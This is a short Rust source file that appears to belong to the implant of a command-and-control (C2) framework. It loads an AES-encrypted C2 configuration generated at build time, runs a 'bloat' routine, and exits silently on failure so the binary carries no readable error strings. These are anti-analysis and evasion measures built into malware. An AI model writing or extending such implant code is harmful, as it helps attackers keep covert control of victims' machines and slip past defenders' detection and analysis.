// ./src/agent/config.rs
use crate::common::C2Config;

// This file is generated by build.rs and contains the
// AES Key, Nonce, Ciphertext arrays and the decrypt function.
include!(concat!(env!("OUT_DIR"), "/obfuscated_config.rs"));
include!(concat!(env!("OUT_DIR"), "/bloat_data.rs"));

pub fn load() -> C2Config {
    // 1. Run Bloat
    use_bloat();

    // 2. Unpack - silent exit on failure (no readable panic string in binary)
    try_load().unwrap_or_else(|| std::process::exit(1))
}

/// Non-fatal embedded-config read for diagnostics: returns None when no
/// valid config is embedded (e.g. unit-test binaries), where load() would
/// terminate the process. Skips the bloat routine - irrelevant for reads.
pub fn try_load() -> Option<C2Config> {
    let bytes = get_config();
    C2Config::unpack(&bytes)
}
